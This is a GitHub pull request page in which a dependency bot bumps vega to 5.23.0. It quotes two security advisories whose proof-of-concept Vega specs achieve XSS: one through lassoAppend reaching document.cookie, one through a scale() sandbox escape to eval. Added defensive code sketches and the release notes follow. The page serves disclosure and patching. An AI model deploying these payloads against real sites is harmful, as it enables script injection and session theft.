stencila / designa

📐 Stencila's design system
https://stencila.github.io/designa
Apache License 2.0

fix(dependencies): update dependency vega to v5.23.0 [security] #360

Closed renovate[bot] closed 10 months ago

renovate[bot] commented 1 year ago

Mend Renovate

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| vega | `5.22.0` -> `5.23.0` | (badge) | (badge) | (badge) | (badge) |

GitHub Vulnerability Alerts

CVE-2023-26487

Summary

Vega's lassoAppend function: lassoAppend accepts 3 arguments and internally invokes the push function on the 1st argument, passing an array consisting of the 2nd and 3rd arguments as the push call argument. The type of the 1st argument is supposed to be an array, but this is not enforced.

This makes it possible to specify any object with a push function as the 1st argument; the push function can be set to any function that can be accessed via event.view (not all such functions can be exploited due to invalid context or signature, but some can, e.g. console.log).

Details

The issue is that lassoAppend doesn't enforce proper types of its arguments:

```js
.....
export function lassoAppend(lasso, x, y, minDist = 5) {
    const last = lasso[lasso.length - 1];

    // Add point to lasso if distance to last point exceeds minDist or it's the first point
    if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {
        lasso.push([x, y]);
.....
```
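As an added example, not code from the page or from the vega project, here is the shape of a guard that closes this hole: the first argument must actually be an array before `push` is ever called on it, and the coordinates must be numbers. The `lassoAppendSafe` name, the `Array.isArray` check and the coordinate check are assumptions for illustration, not necessarily the exact change vega-functions shipped in v5.23.0.

```javascript
// Added example (not vega's own code): lassoAppend with the first argument's
// type enforced before push is called on it. The Array.isArray guard and the
// TypeError are assumptions for illustration, not necessarily the exact
// change vega-functions shipped in v5.23.0.
function lassoAppendSafe(lasso, x, y, minDist = 5) {
  // Reject anything that merely has a push property: the advisory's issue is
  // that any object carrying a callable push was accepted here.
  if (!Array.isArray(lasso)) {
    throw new TypeError('lassoAppend: lasso must be an array');
  }
  // Coordinates are numbers; refusing strings keeps attacker-chosen text out
  // of whatever later consumes the lasso.
  if (typeof x !== 'number' || typeof y !== 'number' ||
      !Number.isFinite(x) || !Number.isFinite(y)) {
    throw new TypeError('lassoAppend: x and y must be finite numbers');
  }
  const last = lasso[lasso.length - 1];
  // Add the point if it is the first one or farther than minDist from the last
  if (last === undefined || Math.hypot(last[0] - x, last[1] - y) > minDist) {
    lasso.push([x, y]);
  }
  return lasso;
}

// Probe used to confirm the guard: a constructed object that looks like an
// array to duck-typed code (it has push) but is not one. Returns true only if
// its push was invoked, which the hardened function must never do.
function probePushOnNonArray() {
  let invoked = false;
  const notAnArray = { length: 0, push: () => { invoked = true; } };
  try {
    lassoAppendSafe(notAnArray, 1, 2);
  } catch (e) {
    if (!(e instanceof TypeError)) throw e;
  }
  return invoked;
}
```

The point of the probe is the regression check a reviewer would want: an object with a `push` property is rejected with a `TypeError` and its `push` is never reached, while ordinary array input keeps the original minDist behaviour.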

PoC

Use the following Vega snippet (it depends on the browser's non-built-in event.view.setImmediate function; feel free to replace it with event.view.console.log or the like and observe the result in the browser's console):

```json
{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": false,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')"
        }
      ]
    }
  ],
  "marks": [
    {
      "name": "circle",
      "type": "symbol",
      "zindex": 1,
      "encode": {
        "enter": {
          "y": {"signal": "height/2"},
          "angle": {"value": 0},
          "size": {"value": 400},
          "shape": {"value": "circle"},
          "fill": {"value": "white"},
          "stroke": {"value": "white"},
          "strokeWidth": {"value": 2},
          "cursor": {"value": "pointer"},
          "tooltip": {"signal": "{Tip: 'Click to fire XSS'}"}
        },
        "update": {"x": {"signal": "toggle === true ? 190 : 165"}}
      }
    },
    {
      "name": "rectangle",
      "type": "rect",
      "zindex": 0,
      "encode": {
        "enter": {
          "x": {"value": 152},
          "y": {"value": 162.5},
          "width": {"value": 50},
          "height": {"value": 25},
          "cornerRadius": {"value": 20}
        },
        "update": {
          "fill": {"signal": "toggle === true ? '#006BB4' : '#939597'"}
        }
      }
    }
  ]
}
```

Impact

This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS setImmediate polyfill basically allows eval-like functionality).

CVE-2023-26486

Summary

The Vega scale expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.

Details

The scale expression function passes a user-supplied argument, `group`, to `getScale`, which is then used as if it were an internal context. `context.scales[name].value` is accessed from `group` and called as a function back in `scale`.
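As an added example, not code from the page or from the vega project, here is an illustrative model of the safer shape: scale functions are resolved from a registry the runtime owns, keyed by the group's identity, and no `context` object reachable from the expression's own arguments is ever consulted. The names `makeScaleResolver`, `trustedScopes` and `applyScale` are assumptions for this example, not vega-functions identifiers, and the scope model is a simplification of Vega's nested groups.

```javascript
// Added example (not vega's own code): an illustrative model of a scale
// lookup that does not trust the expression-supplied group argument. Names
// such as makeScaleResolver and trustedScopes are assumptions for this
// example, not vega-functions identifiers.
//
// trustedScopes is built by the runtime when the view is constructed:
//   { [scopeId]: { [scaleName]: scaleFunction } }
// The resolver closes over it, so no value reachable from an expression can
// replace it. The group argument selects a scope by an identifier only; any
// "context" or "scales" property the group itself carries is never read.
function makeScaleResolver(trustedScopes) {
  const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);
  return function resolveScale(name, group) {
    const scopeId = group && typeof group.id === 'string' ? group.id : 'root';
    const scope = hasOwn(trustedScopes, scopeId) ? trustedScopes[scopeId] : undefined;
    // hasOwn (rather than `in` or plain property access) keeps names such as
    // "constructor" from reaching Object.prototype members.
    const fn = scope && typeof name === 'string' && hasOwn(scope, name)
      ? scope[name]
      : undefined;
    if (typeof fn !== 'function') {
      throw new Error(`scale: no registered scale "${name}" in scope "${scopeId}"`);
    }
    return fn;
  };
}

// Convenience wrapper mirroring the expression function's shape:
// scale(name, value, group). Returns the scaled value.
function applyScale(resolver, name, value, group) {
  return resolver(name, group)(value);
}

// Constructed sample scopes: a root scope with one scale and a nested group
// scope with its own scale.
const sampleScopes = {
  root: { x: v => v * 2 },
  sub: { y: v => v + 1 },
};
const sampleResolver = makeScaleResolver(sampleScopes);
```

The check worth keeping as a regression test is that a group object carrying its own `context.scales[name].value` has no effect on which function runs: the resolver ignores everything on the group except its identifier, and unknown names (including prototype members such as `constructor`) fail closed.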

PoC

The following Vega definition can be used to demonstrate this issue, executing the JavaScript code `alert(1);`

```json
{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "data": [
    {
      "name": "XSS PoC",
      "values": [1],
      "transform": [
        {
          "type": "formula",
          "as": "amount",
          "expr": "scale('func', null,  {context: {scales: {func: {value: scale('func', 'eval(atob(\"YWxlcnQoMSk7\"))', {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})"
        }
      ]
    }
  ]
}
```

This can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA


Release Notes

vega/vega (vega)

### [`v5.23.0`](https://togithub.com/vega/vega/releases/tag/v5.23.0)

[Compare Source](https://togithub.com/vega/vega/compare/v5.22.1...v5.23.0)

Changes from [v5.22.1](https://togithub.com/vega/vega/releases/tag/v5.22.1): This version contains dependency updates, bug fixes, and security patches, plus a few extra utilities to aid Vega-Lite.

**monorepo**
- Update dependencies, including D3 packages.
- Update rollup config to use `.mjs` extensions.

**vega-canvas**
- Update rollup config.

**vega-crossfilter**
- Update rollup config.

**vega-dataflow**
- Update rollup config.

**vega-encode**
- Update rollup config.

**vega-event-selector**
- Update rollup config.

**vega-expression**
- Update rollup config.

**vega-force**
- Update rollup config.

**vega-format**
- Update rollup config.

**vega-functions**
- Fix `lassoAppend` expression function XSS. (**Thanks [@arvind](https://togithub.com/arvind)!**)
- Fix `scale` expression function XSS (**Thanks [@ajxchapman](https://togithub.com/ajxchapman) and [@hydrosquall](https://togithub.com/hydrosquall)!**)
- Update rollup config.

**vega-geo**
- Update rollup config.

**vega-hierarchy**
- Update rollup config.

**vega-interpreter**
- Update rollup config.

**vega-label**
- Prevent evaluation of unsafe methods, [#3570](https://togithub.com/vega/vega/issues/3570) (**Thanks [@AMoo-Miki](https://togithub.com/AMoo-Miki)!**)
- Update rollup config.

**vega-loader**
- Update rollup config.

**vega-parser**
- Add `view` style for Vega-Lite, [#3480](https://togithub.com/vega/vega/issues/3480) (**Thanks [@arvind](https://togithub.com/arvind)!**)
- Update rollup config.

**vega-projection**
- Register projections as recognized Vega scales.
- Update rollup config.

**vega-projection-extended**
- Update rollup config.

**vega-regression**
- Update rollup config.

**vega-runtime**
- Update rollup config.

**vega-scale**
- Add `registerScale()` and `isRegisteredScale()` methods. (**Thanks [@hydrosquall](https://togithub.com/hydrosquall)!**)
- Register scales as recognized Vega scales.
- Update rollup config.

**vega-scenegraph**
- Update test cases to match dependency updates.
- Update rollup config.

**vega-schema**
- Make `__count__` private from schema, [#3659](https://togithub.com/vega/vega/issues/3659) (**Thanks [@lsh](https://togithub.com/lsh)!**)
- Update rollup config.

**vega-selections**
- Update rollup config.

**vega-statistics**
- Update rollup config.

**vega-time**
- Update rollup config.

**vega-transforms**
- Update rollup config.

**vega-typings**
- Make `__count__` private from schema, [#3659](https://togithub.com/vega/vega/issues/3659) (**Thanks [@lsh](https://togithub.com/lsh)!**)
- Update scenegraph item typings (**Thanks [@jonathanzong](https://togithub.com/jonathanzong)!**)
- Update rollup config.

**vega-util**
- Update typescript config.
- Update rollup config.

**vega-view**
- Wrap querySelectorAll in Array.from, [#3639](https://togithub.com/vega/vega/issues/3639) (**Thanks [@ravron](https://togithub.com/ravron)!**)
- Update rollup config.

**vega-view-transforms**
- Update rollup config.
- Fix autosize="fit-x/y" when legend is larger than plot, [#3474](https://togithub.com/vega/vega/issues/3474) (**Thanks [@stas-sl](https://togithub.com/stas-sl)!**)

**vega-voronoi**
- Update rollup config.

**vega-wordcloud**
- Update rollup config.

**vega-cli**
- Update rimraf version, adjust code in response.
- Update rollup config.

**vega**
- Update test scenes to match dependency updates.
- Update rollup config.

### [`v5.22.1`](https://togithub.com/vega/vega/releases/tag/v5.22.1)

[Compare Source](https://togithub.com/vega/vega/compare/v5.22.0...v5.22.1)

Changes from [v5.22.0](https://togithub.com/vega/vega/releases/tag/v5.22.0):

**monorepo**
- Update dependencies.

**vega-scenegraph**
- Fix SVG path parser null check. ([#3451](https://togithub.com/vega/vega/issues/3451)).

Configuration

📅 Schedule: Branch creation - "" in timezone UTC, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR has been generated by Mend Renovate. View repository job log here.